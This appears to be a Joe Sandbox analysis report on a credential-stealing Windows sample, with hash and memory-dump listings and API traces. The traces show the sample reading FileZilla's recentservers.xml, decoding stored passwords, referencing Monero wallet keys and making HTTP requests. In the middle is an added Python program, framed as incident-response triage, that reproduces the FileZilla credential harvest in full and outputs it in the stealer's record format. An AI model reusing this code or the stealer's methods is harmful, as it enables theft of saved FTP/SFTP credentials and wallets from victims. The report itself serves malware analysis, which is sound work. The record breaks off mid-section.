                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                    • Instruction ID: 06fe7324569f06dfdfde4db634120338355242c62b596c41f5877b4edebcbef5
                                    • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                    • Instruction Fuzzy Hash: 09B11971E097118FD706EE3EC481259F7E1AFE6280F51C72EE895B7662EB31E8818740
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                    • Instruction ID: b1eb86b842cb2a0162773764d4a543a00602e5ee92cf9cda76a1c7d55cee7c9f
                                    • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                    • Instruction Fuzzy Hash: 0191E971A002198FDF95CE98DC80BBAB3A0AF55310F194564EF19AB382D731DE05C7A7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                    • Instruction ID: b136088808b1b963a03d28d3021d6b9acaec9241cd873a35c5ad97d1b54cf73d
                                    • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                    • Instruction Fuzzy Hash: 65B116316106099FD719CF28C49AB65BBA0FF45364F29865CE8D9CF2E2C335E991CB50
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                    • Instruction ID: ab2e8472ab272f7e796c66f4439785375422e988e5aa7b7555b02e0b1a3c171e
                                    • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                    • Instruction Fuzzy Hash: F9C14A75A0471A8FC715DF28C08045AB3F2FF88350F258A6DE8999B721D731E996CF81
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                    • Instruction ID: 45754bd84e4a4f369c064b16d54d800990a058f68d531af02f54cb7d135f2e62
                                    • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                    • Instruction Fuzzy Hash: 7F9177309287D16AEB168B3DCC427BAB794FFE6350F14C31AF999724A1FB7186818341
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                    • Instruction ID: 1f784e7786a42ea115f178f0d6f5a23359764fa6879af15bc0c48b33f0837d0f
                                    • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                    • Instruction Fuzzy Hash: F0A14072A10A19CBEB59CF55CCC1AAEBBB1FB54314F14C62AD51AE73A0D334AA40CF51
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                    • Instruction ID: ef7c4659d5d2aa68e1062c993072dd43fa23695cafdcdd9d8048ce4440d9f58d
                                    • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                    • Instruction Fuzzy Hash: 18A16E72A083519BD308CF25C89075BF7E2EFC8710F1ACA3DE8A997254D774E9419A82
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c31f280d8a86256a98588ec02f88e937cadbf8167d7355550eaac8fcb2ca1fe0
                                    • Instruction ID: b0ff4e6284f2d953769f6f3ebf27d7574a278df12d466cfd6fad600bbdf933e3
                                    • Opcode Fuzzy Hash: c31f280d8a86256a98588ec02f88e937cadbf8167d7355550eaac8fcb2ca1fe0
                                    • Instruction Fuzzy Hash: 5E51F8F39083149BE3147E2DEC8476ABBD9DB54720F1B0A3DEBD483784EA7599108686
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                    • Instruction ID: cf21a2ac94c2d29b89ce5bb7bd8e6a6174f32a85d693cb019916a65bf4897e68
                                    • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                    • Instruction Fuzzy Hash: AB512962E09BD985C7058B7544502EEBFB25FE6210F1E839EC4981F383C3759689D3E6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                    • Instruction ID: 4d4380f719737e920eca18c290049424b63e8615d1407fedd07d3ef3da97591e
                                    • Opcode Fuzzy Hash: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                    • Instruction Fuzzy Hash: E5D0C9716097114FC3688F1EB440946FAE8DBD8320715C53FA09AC3750C6B094418B54
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C98F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C98F9B
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                      • Part of subcall function 00C8A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C8A13C
                                      • Part of subcall function 00C8A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C8A161
                                      • Part of subcall function 00C8A110: LocalAlloc.KERNEL32(00000040,?), ref: 00C8A181
                                      • Part of subcall function 00C8A110: ReadFile.KERNEL32(000000FF,?,00000000,00C8148F,00000000), ref: 00C8A1AA
                                      • Part of subcall function 00C8A110: LocalFree.KERNEL32(00C8148F), ref: 00C8A1E0
                                      • Part of subcall function 00C8A110: CloseHandle.KERNEL32(000000FF), ref: 00C8A1EA
                                      • Part of subcall function 00C98FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C98FE2
                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00CA0DBF,00CA0DBE,00CA0DBB,00CA0DBA), ref: 00C904C2
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C904C9
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00C904E5
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CA0DB7), ref: 00C904F3
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 00C9052F
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CA0DB7), ref: 00C9053D
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00C90579
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CA0DB7), ref: 00C90587
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00C905C3
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CA0DB7), ref: 00C905D5
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CA0DB7), ref: 00C90662
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CA0DB7), ref: 00C9067A
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CA0DB7), ref: 00C90692
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CA0DB7), ref: 00C906AA
                                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00C906C2
                                    • lstrcat.KERNEL32(?,profile: null), ref: 00C906D1
                                    • lstrcat.KERNEL32(?,url: ), ref: 00C906E0
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C906F3
                                    • lstrcat.KERNEL32(?,00CA1770), ref: 00C90702
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C90715
                                    • lstrcat.KERNEL32(?,00CA1774), ref: 00C90724
                                    • lstrcat.KERNEL32(?,login: ), ref: 00C90733
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C90746
                                    • lstrcat.KERNEL32(?,00CA1780), ref: 00C90755
                                    • lstrcat.KERNEL32(?,password: ), ref: 00C90764
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C90777
                                    • lstrcat.KERNEL32(?,00CA1790), ref: 00C90786
                                    • lstrcat.KERNEL32(?,00CA1794), ref: 00C90795
                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CA0DB7), ref: 00C907EE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 1942843190-555421843
                                    • Opcode ID: e9f734597c1c3978a53bfab7547afc01a19ed289faa41d94b0ca98cc632f557b
                                    • Instruction ID: 66baf18deec2fdc3abd3a94f7b4292e079162eb6937ea6aed765e8064ccfdfc7
                                    • Opcode Fuzzy Hash: e9f734597c1c3978a53bfab7547afc01a19ed289faa41d94b0ca98cc632f557b
                                    • Instruction Fuzzy Hash: 89D12F72910208ABCF04FBF4DD9AEEE7739AF15701F508558F602A7091DF34AA48DBA5
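The API trace and string set of the function above describe the sample's FileZilla credential theft: it reads \AppData\Roaming\FileZilla\recentservers.xml into a heap buffer (CreateFileA / GetFileSizeEx / ReadFile in the subcall, then GetProcessHeap / RtlAllocateHeap), locates each <Host>, <Port>, <User> and <Pass encoding="base64"> tag with StrStrA, skips over the tag with lstrlen, and builds a "browser: FileZilla / profile: null / url: / login: / password:" record with a chain of lstrcat calls. The Python below is an added analyst re-implementation of that routine for triage; it is not code from the sample, from Joe Sandbox or from FileZilla. It lets a responder see exactly which plaintext credentials a victim's recentservers.xml would have yielded so the affected FTP/SFTP accounts can be rotated. The XML input is constructed for the example; the ':' between host and port and the newline terminators are assumptions, because the report references those separator strings only by address (00CA1770, 00CA1774, 00CA1780, 00CA1790, 00CA1794). Unlike a flat substring scan, each lookup here is scoped to its <Server> element so an anonymous entry without <User>/<Pass> cannot swallow the next server's fields, and a malformed base64 value is reported as missing instead of aborting the run.

```python
from __future__ import annotations

import base64
import binascii

# Constructed sample that mimics FileZilla's recentservers.xml layout. The real
# file is %APPDATA%\FileZilla\recentservers.xml (the path string in the dump).
SAMPLE_RECENTSERVERS = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.4" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>alice</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>ftp.anon.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Logontype>0</Logontype>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>bob</User>
      <Pass encoding="base64">cGFzc3cwcmQh</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>broken.example.test</Host>
      <Port>21</Port>
      <User>carol</User>
      <Pass encoding="base64">!!not-base64!!</Pass>
    </Server>
  </RecentServers>
</FileZilla3>
"""

PASS_TAG = '<Pass encoding="base64">'  # exact tag text the sample searches for


def _tag_text(chunk: str, tag: str) -> str | None:
    """Mimic StrStrA(chunk, tag) followed by lstrlen(tag) to step past the tag;
    the value runs up to the next '<'. Returns None when the tag is absent."""
    idx = chunk.find(tag)
    if idx == -1:
        return None
    begin = idx + len(tag)
    end = chunk.find("<", begin)
    return chunk[begin:end if end != -1 else len(chunk)]


def _decode_pass(b64: str | None) -> str | None:
    """FileZilla stores the password base64-encoded, not encrypted."""
    if b64 is None:
        return None
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None  # malformed entry: report as missing, keep harvesting


def parse_recent_servers(xml_text: str) -> list[dict]:
    """One record per <Server> element. Scoping each scan to the element keeps
    an anonymous entry (no <User>/<Pass>) from absorbing the next server's
    credentials, which a naive global StrStrA loop would do."""
    records = []
    pos = 0
    while True:
        start = xml_text.find("<Server>", pos)
        if start == -1:
            break
        end = xml_text.find("</Server>", start)
        if end == -1:
            end = len(xml_text)
        chunk = xml_text[start:end]
        pos = end
        records.append({
            "host": _tag_text(chunk, "<Host>"),
            "port": _tag_text(chunk, "<Port>"),
            "login": _tag_text(chunk, "<User>"),
            "password": _decode_pass(_tag_text(chunk, PASS_TAG)),
        })
    return records


def format_record(rec: dict) -> str:
    """Emit the record in the shape the lstrcat chain builds. The labels are the
    literal strings from the dump; the ':' between host and port and the
    newline terminators are assumptions (only referenced by address there)."""
    return (
        "browser: FileZilla\n"
        "profile: null\n"
        f"url: {rec['host'] or ''}:{rec['port'] or ''}\n"
        f"login: {rec['login'] or ''}\n"
        f"password: {rec['password'] or ''}\n"
    )


def harvest(xml_text: str) -> str:
    """Full text block the stealer would ship for this file."""
    return "".join(format_record(r) for r in parse_recent_servers(xml_text))


if __name__ == "__main__":
    print(harvest(SAMPLE_RECENTSERVERS))
```

Run it against a copy of a victim's recentservers.xml (and sitemanager.xml, which uses the same <Server> schema) to enumerate the accounts that must be rotated. `validate=True` on the base64 decode is deliberate: FileZilla writes clean base64, so anything that fails strict decoding is worth a second look rather than a silent best-effort decode.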
                                    APIs
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                      • Part of subcall function 00C84800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C84889
                                      • Part of subcall function 00C84800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C84899
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C85A48
                                    • StrCmpCA.SHLWAPI(?,0152E3C0), ref: 00C85A63
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C85BE3
                                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0152E240,00000000,?,0152A038,00000000,?,00CA1B4C), ref: 00C85EC1
                                    • lstrlen.KERNEL32(00000000), ref: 00C85ED2
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00C85EE3
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C85EEA
                                    • lstrlen.KERNEL32(00000000), ref: 00C85EFF
                                    • lstrlen.KERNEL32(00000000), ref: 00C85F28
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00C85F41
                                    • lstrlen.KERNEL32(00000000,?,?), ref: 00C85F6B
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00C85F7F
                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00C85F9C
                                    • InternetCloseHandle.WININET(00000000), ref: 00C86000
                                    • InternetCloseHandle.WININET(00000000), ref: 00C8600D
                                    • HttpOpenRequestA.WININET(00000000,0152E290,?,0152DA28,00000000,00000000,00400100,00000000), ref: 00C85C48
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                    • InternetCloseHandle.WININET(00000000), ref: 00C86017
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Yara matches
                                    Similarity
